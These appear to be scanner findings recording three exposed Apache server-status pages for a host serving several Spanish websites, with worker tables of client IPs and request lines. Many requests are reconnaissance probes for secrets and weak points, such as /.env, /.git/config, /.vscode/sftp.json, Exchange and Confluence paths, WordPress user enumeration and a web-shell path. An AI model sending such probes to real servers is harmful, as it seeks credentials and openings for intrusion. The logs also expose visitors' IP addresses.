64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-232139150/0/1350_ 0.00002561400.00.0026.70 162.158.90.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-232139150/0/1173_ 0.00002956220.00.0041.49 172.69.240.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-232140480/2/1704_ 0.00003499120.00.0128.97 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-232140480/2/1857_ 0.00006676470.00.0033.43 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-232140480/0/2013_ 0.00031217723300.00.0047.61 172.71.254.96h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-232140480/1/1753_ 0.000026346150.00.0028.00 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-232140480/1/2002_ 0.00003673350.00.0031.44 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-232140480/1/1911_ 0.000015721840.00.0032.33 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-232140480/0/1821_ 0.0016412531480.00.0036.70 162.158.189.79h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-232140480/0/2102_ 0.0001625396270.00.0027.62 172.70.46.184h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-232140480/1/1883_ 0.000010414490.00.0037.04 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-232140480/1/1865_ 0.00008062000.00.0025.12 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-232139160/0/1626_ 0.00003777730.00.0033.86 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-232139160/0/1552_ 0.00203620470.00.0034.56 23.178.112.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/Hw8pzmN9MRXck8AQHeP0Ms-epDuvtO9 2-232139160/0/1603_ 0.00003565500.00.0041.31 64.227.126.135http/1.1 2-232139160/0/1675_ 0.00067844825280.00.0038.82 172.71.103.60h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-232139160/1/1462_ 0.000045794690.00.0046.71 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-232139160/1/1623_ 0.00003620600.00.0034.16 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-232139160/0/1527_ 0.00004083400.00.0028.64 172.69.240.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-232139160/1/1492_ 0.00003423400.00.0034.48 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-232139160/0/1713_ 0.0001913385170.00.0035.09 64.227.126.135http/1.1 2-232139160/1/1486_ 0.00003889270.00.0049.35 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-232139170/0/1189_ 0.001010598200.00.0027.95 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-232139170/0/1251_ 0.000248705180.00.0035.65 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-232139170/0/1060_ 0.0003273457370.00.0024.33 64.227.126.135http/1.1 3-232139170/0/1191_ 0.0002443839590.00.0023.69 64.227.126.135http/1.1 3-232139170/0/1068_ 0.00003913400.00.0023.63 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-232139170/0/1132_ 0.000016687650.00.0033.74 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-232139170/1/1104_ 0.00008141760.00.0034.89 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 3-232139170/1/1093_ 0.01009435050.00.0027.06 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-232139170/0/1106_ 0.0021909238980.00.0030.15 172.69.240.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-232139170/0/1226_ 0.0026516112030.00.0021.88 172.70.47.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-232139180/1/2290_ 0.00008588950.00.0050.57 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-232139180/1/2586_ 0.00007860670.00.0042.49 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-232139180/1/2411_ 0.000046363980.00.0048.13 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-232139180/1/2333_ 0.000012016670.00.0042.39 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-232139180/0/2328_ 0.00005382150.00.0058.38 172.70.254.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-232139180/0/2402_ 0.002016588060.00.0038.61 172.70.214.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-232139180/0/2101_ 0.00209591910.00.0040.35 162.158.91.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/re
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e38e199c23
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 22-Sep-2023 23:35:49 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 15 days 11 hours 45 minutes 46 seconds Server load: 0.16 0.08 0.04 Total accesses: 878311 - Total Traffic: 20.5 GB - Total Duration: 266735708 CPU Usage: u206.37 s206.42 cu2617.4 cs2422.87 - .407% CPU load .656 requests/sec - 16.1 kB/second - 24.5 kB/request - 303.692 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0727175no1yes19000 1654142no0yes010000 2654143no0yes010000 3654141no0yes010000 4745202no0yes010000 Sum501 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-217271750/1145/12612_ 49.8411730105490.022.99266.53 144.126.202.105h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-217271750/1230/12333_ 49.85030834575860.017.20291.92 144.126.202.105http/1.1 0-217271750/1517/13370_ 49.82038837374080.020.81297.84 79.155.188.49h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1498/12715W 49.880057755340.025.48316.93 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-217271750/1195/11957_ 49.921252293580.019.38296.63 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-217271750/1511/11833_ 49.4314049330650.020.86293.87 181.189.133.62h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1210/12262_ 49.920081669590.033.08323.03 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-217271750/1111/11789_ 49.86047355945630.020.08278.76 172.68.150.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1232/11879_ 49.930054739310.026.60321.15 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-217271750/1215/11856_ 49.85030362863850.015.26243.93 144.126.202.105h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216541420/784/19338_ 87.2169244321660.012.74495.49 141.101.100.195h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/971/19627_ 87.21892064768910.031.19453.69 141.101.100.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/1014/20021_ 87.53740134335620.013.21477.40 108.162.245.195h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/763/19582_ 87.210039174330.019.91446.46 144.126.202.105http/1.1 1-216541420/696/19411_ 87.16892254970810.013.05472.45 172.70.254.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/771/20285_ 87.160078125020.015.09413.70 172.70.254.129h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-216541420/792/20181_ 87.560032660670.012.94497.24 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-216541420/1014/20403_ 87.16892203113805210.022.61479.51 92.53.96.244http/1.1barrerasdecontencion.com:443GET /wp-content/woh.php HTTP/1.1 1-216541420/823/19858_ 87.21137146297370.020.08474.53 79.155.188.49h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216541420/803/20564_ 87.2169039763150.021.53528.64 141.101.100.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/684/9226_ 79.28671624750060.013.12188.73 198.204.245.218http/1.1relehse.com:443GET /user.bz2 HTTP/1.1 2-216541430/531/9100_ 79.320028213030.09.77219.90 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-216541430/577/9934_ 79.1464220963800.09.04180.00 181.189.133.62h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/487/10053_ 79.1063051962010.06.41203.56 181.189.133.62h2tandemsl.com:443done, streams: 0/57/57/0/0 (open/recv/resp/push/rst) 2-216541430/570/9820_ 79.166348935333030.011.72236.63 172.70.254.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/558/9102_ 79.10620104446000.012.05195.29 181.189.133.62h2tandemsl.com:443idle, streams: 0/23/23/0/0 (open/recv/resp/push/rst) 2-216541430/561/9160_ 79.131035587190.011.31182.53 144.126.202.105h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216541430/633/9132_ 79.1564023910580.08.89184.43 181.189.133.62h2tandemsl.com:443idle, streams: 0/57/57/0/0 (open/recv/resp/push/rst) 2-216541430/446/8929_ 79.1062029336970.07.62192.77 181.189.133.62h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/689/9659_ 79.28049432679420.013.24200.55 144.126.202.105http/1.1 3-216541410/518/16072_ 82.4859074508410.08.16403.79 141.101.100.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/711/16113_ 82.850046255660.014.15412.40 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-216541410/688/16462_ 82.816827746027460.010.83445.05 172.68.150.74h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/431/17144_ 82.850026196800.027.94432.12 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-216541410/436/15328_ 82.4758047526490.06.75389.66 141.101.100.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/664/15441_ 82.4763073424960.015.41368.05 141.101.100.147h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/649/15665_ 82.410236735360.013.87377.07 144.126.202.105http/1.1 3-216541410/576/15595_ 82.4863034640960.044.22439.44 141.101.100.180h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/598/16118_ 82.471027914880.07.52409.46 144.126.202.105h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216541410/525/17102_ 82.826443232838040.09.99350.79 172.68.150.64h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-217452020/172/29592_ 9.65027757470860.05.06700.67 144.126.202.105h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-217452020/156/31054_ 9.635528467276120.02.92679.68 172.68.150.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-217452020/194/29461_ 9.645243355582250.04.41723.85 172.68.150.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-217452020/198/30253_ 9.6011954047160.03.10827.23 144.126.202.105http/1.1 4-217452020/205/29592_ 9.64512470161120.02.32691.82 103.23.61.80http/1.1tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-217452020/194/29603_ 9.59551959709760.05.93799.20 198.204.245.218http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3699f1539
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 19-Sep-2023 07:59:26 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 11 days 20 hours 9 minutes 22 seconds Server load: 0.00 0.03 0.00 Total accesses: 645415 - Total Traffic: 14.8 GB - Total Duration: 85896994 CPU Usage: u238.2 s219.21 cu1865.42 cs1371.52 - .361% CPU load .631 requests/sec - 15.1 kB/second - 24.0 kB/request - 133.088 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0437745no0yes010000 1513539no0yes010000 2437746no0yes010000 3437747no0yes19000 4531555no0yes010000 Sum500 149000 _____________________________________W____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-204377450/559/5507_ 91.644536276376150.010.73113.81 72.14.201.219h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-204377450/568/5166_ 91.54104406712090.08.21123.52 149.54.1.229http/1.1lcftech.es:443GET /wp-content/plugins/sitepress-multilingual-cms/templates/la 0-204377450/594/5565_ 91.97100837561350.07.73129.64 66.249.70.163http/1.1tandemsl.com:443GET /wp-content/uploads/elementor/css/post-20056.css?ver=169174 0-204377450/519/5474_ 91.61100406589510.09.09106.37 66.249.70.163http/1.1 0-204377450/547/5337_ 92.381261957850580.019.19113.40 72.14.201.62h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204377450/436/4951_ 91.1501397573720.012.73112.71 45.5.69.216h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-204377450/550/5247_ 91.65118032430.010.73108.48 138.68.133.118http/1.1 0-204377450/648/5313_ 92.43007710320.013.9885.18 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-204377450/509/5546_ 91.62104408543110.017.07137.19 212.142.160.70http/1.1lcftech.es:443GET /wp-content/uploads/2021/07/Para-GrandesSuperficies-1024x68 0-204377450/504/5108_ 91.95104416968090.09.3986.10 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1695102122.01504302024841308593 1-205135390/1609/17176_ 69.830021982300.067.06452.82 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-205135390/1562/17281_ 69.48411423179850.040.78383.47 93.156.209.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-205135390/1787/17576_ 69.510023935690.045.62408.54 86.48.31.195http/1.1 1-205135390/1700/17380_ 69.49137223259990.037.07388.97 93.156.209.115h2tandemsl.com:443idle, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 1-205135390/1663/17250_ 69.49174520455300.023.41422.82 189.129.56.106h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-205135390/1582/18045_ 69.830020090160.024.65363.76 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-205135390/1615/18137_ 69.5113732821804040.052.53456.13 86.48.31.195http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-205135390/1777/17738_ 69.5413733519984560.040.75422.96 86.48.31.195http/1.1tandemsl.com:443GET /?author=1 HTTP/1.1 1-205135390/1682/17531_ 69.820223129220.027.92418.41 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-205135390/1721/18304_ 69.49137024567370.036.23477.46 93.156.209.115h2tandemsl.com:443done, streams: 0/63/63/0/0 (open/recv/resp/push/rst) 2-204377460/860/5956_ 94.6546918762630.013.85109.53 24.206.104.54http/1.1tandemsl.com:443GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.2 HTTP/1.1 2-204377460/773/6026_ 94.6547607979080.025.13157.20 24.206.104.54http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/866/6289_ 94.6568109086630.015.58110.85 24.206.104.54http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/961/6561_ 94.66781012416740.019.20139.92 24.206.104.54http/1.1tandemsl.com:443GET /wp-content/uploads/2019/10/search-icon-tandemhse.png HTTP/ 2-204377460/671/6109_ 94.716728728856610.012.29146.42 86.48.31.195http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-204377460/819/5978_ 94.2274109598390.012.97115.46 93.156.209.115h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/848/5975_ 94.25777016319080.010.93122.01 24.206.104.54http/1.1 2-204377460/743/5884_ 94.65668011010840.09.50100.61 24.206.104.54http/1.1tandemsl.com:443GET /wp-content/plugins/sitepress-multilingual-cms/templates/la 2-204377460/848/5849_ 94.66128902490.015.55131.42 138.68.133.118http/1.1 2-204377460/981/6203_ 94.65536015457580.011.89126.28 177.232.89.254h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-204377470/667/12735_ 91.680017408290.013.67339.22 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-204377470/894/12831_ 91.5994016248390.048.27348.77 74.125.151.162http/1.1 3-204377470/694/13590_ 91.6710022280150.011.46365.21 52.56.72.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 3-204377470/698/13967_ 91.5899016972570.014.50336.18 90.74.44.94h2lcftech.es:443idle, streams: 0/33/33/0/0 (open/recv/resp/push/rst) 3-204377470/758/12645_ 91.62993116980770.015.76333.67 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1695103066.59725499153137207031 3-204377470/797/12900_ 91.5999019291640.031.50306.50 90.74.44.94h2lcftech.es:443idle, streams: 0/34/34/0/0 (open/recv/resp/push/rst) 3-204377470/738/12877_ 91.591023680150.015.35298.13 138.68.133.118http/1.1 3-204377470/669/12671W 91.510019651100.010.40317.21 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-204377470/693/12999_ 91.629974616111470.020.01335.12 74.125.151.162http/1.1tandemsl.com:443GET /seguridad-industrial-blog/metodo-mosler-analisis-riesgo/ H 3-204377470/738/14142_ 91.511016474480.018.20289.19 138.68.133.118http/1.1 4-205315550/783/22200_ 35.78216026685110.017.74517.55 72.14.201.62h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-205315550/804/23325_ 35.74139928456200.014.30478.91 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/706/21917_ 35.791026851930.013.34557.05 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/778/22364_ 35.7912525920840.011.21578.13 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/685/22076_ 35.860027329240.09.00506.75 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-205315550/962/22061_ 35.661026938820.012.33589.18 138.68.133.118http/1.1 4-205315550/725/22602_ 35.791025834890.011.23529.19 138.68.133.118
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3e60d80e6
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 16-Sep-2023 17:13:38 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 9 days 5 hours 23 minutes 34 seconds Server load: 0.03 0.08 0.03 Total accesses: 531039 - Total Traffic: 12.0 GB - Total Duration: 71990708 CPU Usage: u253.91 s208.42 cu1418.86 cs1053.8 - .368% CPU load .666 requests/sec - 15.8 kB/second - 23.8 kB/request - 135.566 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0277443no0yes010000 1388014no0yes19000 2277444no0yes010000 3323894no1yes010000 4385445no4yes010012 Sum505 149012 ______________W___________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-192774430/662/4926_ 101.47586105889610.013.97102.26 172.70.113.111http/1.1 0-192774430/643/4567_ 104.04316223580.021.19113.77 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-192774430/759/4933_ 103.6311706861630.025.93120.83 66.249.66.67http/1.1tandemsl.com:443GET /wp-content/uploads/elementor/css/post-17765.css?ver=169036 0-192774430/707/4908_ 103.99316003180.017.4695.06 146.190.160.11http/1.1 0-192774430/755/4767_ 103.9912217208600.016.1293.67 84.78.17.169h2barrerasdecontencion.com:443idle, streams: 0/43/43/0/1 (open/recv/resp/push/rst) 0-192774430/539/4483_ 102.685807187020.014.0299.45 172.70.113.111http/1.1 0-192774430/613/4673_ 103.371221347488250.014.5897.38 172.68.149.7http/1.1 0-192774430/668/4619_ 103.9931547219670.010.8170.16 84.78.17.169h2barrerasdecontencion.com:443idle, streams: 0/42/42/0/0 (open/recv/resp/push/rst) 0-192774430/640/5008_ 103.26508109130.016.45119.39 146.190.160.11http/1.1 0-192774430/657/4577_ 103.431174116439410.010.7675.97 66.249.66.206http/1.1tandemsl.com:443done, streams: 0/43/43/0/1 (open/recv/resp/push/rst) 1-193880140/927/12836_ 35.16043715964810.030.26315.72 66.249.66.66http/1.1tandemsl.com:443GET /ingenieria-hse/seguridad-y-salud/ HTTP/1.1 1-193880140/926/12496_ 35.110016925590.023.48261.74 172.68.72.158http/1.1 1-193880140/910/12556_ 35.094016279680.026.57299.15 146.190.160.11h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-193880140/947/12918_ 35.0944017009310.031.86283.63 146.190.160.11http/1.1 1-193880140/855/12432W 35.060014179600.030.17308.50 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-193880140/896/13450_ 35.110013731330.028.00275.82 172.68.72.158http/1.1 1-193880140/972/13509_ 35.060015136710.062.51335.72 172.68.72.158http/1.1 1-193880140/953/12983_ 35.141014003300.020.88321.40 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-193880140/932/12780_ 35.081017153030.024.38321.35 152.200.176.116h2tandemsl.com:443idle, streams: 0/73/73/0/0 (open/recv/resp/push/rst) 1-193880140/878/13198_ 35.074018092660.027.65348.64 146.190.160.11h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/947/5067_ 111.005807704410.014.3794.25 172.70.113.111http/1.1 2-192774440/989/5233_ 113.1165237133640.034.22131.46 172.71.253.52http/1.1 2-192774440/835/5404_ 112.88214527986920.013.8994.65 172.69.234.81http/1.1 2-192774440/946/5581_ 113.5114137111545720.019.08120.35 84.78.17.169h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/975/5416_ 110.498107917380.021.20133.07 68.183.64.176h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/910/5108_ 112.881178998580750.022.44101.17 162.158.165.125http/1.1 2-192774440/1019/5080_ 113.619541815095630.021.55110.61 172.71.173.92http/1.1 2-192774440/968/5114_ 114.3411781229897390.021.5590.60 68.183.64.176http/1.1lcftech.es:443GET /.env HTTP/1.1 2-192774440/836/4978_ 114.34581338062410.015.75112.40 162.158.173.82http/1.1 2-192774440/949/5199_ 111.9595014369300.031.20113.08 172.71.173.92http/1.1 3-193238940/2745/11992_ 116.8095016588200.088.49323.44 172.71.173.92http/1.1 3-193238940/2374/11889_ 116.8258015184160.0108.16299.11 162.158.173.82http/1.1 3-193238940/2783/12834_ 116.905121476920.092.48352.40 212.169.231.9h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-193238940/2622/13144_ 116.830015565010.063.33319.22 2.155.76.158h2lcftech.es:443idle, streams: 0/58/58/0/0 (open/recv/resp/push/rst) 3-193238940/2513/11843_ 116.8058116248870.070.01316.73 172.70.113.111http/1.1 3-193238940/2369/12003_ 116.830018510580.054.50272.35 2.155.76.158h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-193238940/2566/12078_ 116.75186022932830.073.41279.34 2.155.76.158h2lcftech.es:443done, streams: 0/58/58/0/0 (open/recv/resp/push/rst) 3-193238940/2623/11924_ 116.8095017986150.076.55305.59 172.71.173.92http/1.1 3-193238940/2857/12253_ 116.8058015293830.081.93313.04 162.158.173.82http/1.1 3-193238940/2580/13349_ 116.80186315860390.047.07268.82 2.155.76.158h2lcftech.es:443idle, streams: 0/21/21/0/0 (open/recv/resp/push/rst) 4-193854450/858/17625_ 34.960020956940.026.76396.54 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-193854450/886/18700_ 34.962023255210.025.98335.14 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-193854450/740/17441_ 34.9615421434970.015.12449.80 212.169.231.9h2barrerasdecontencion.com:443idle, streams: 0/45/45/0/1 (open/recv/resp/push/rst) 4-193854450/795/17807_ 34.961021306980.015.00467.74 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-193854450/843/18005_ 34.80192422620530.029.83377.94 67.205.60.166http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-193854450/867/17530_ 34.954022517800.014.96494.26 212.169.231.9h2barrerasdecontencion.com:443idle, streams: 0/43/43/0/1 (open/recv/resp/push/rst) 4-193854450/737/18547_ 34.952021065940.016.01415.72 146.190.160.11http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-193854450/863/17844_ 34.8205021838500.022.61417.25 84.78.17.169h2barrerasdecontencion.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-193854450/868/17575_ 34.9614321276930.014.89412.76 212.169.231.9h2barrerasdecontencion.com:443i
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e345d91510
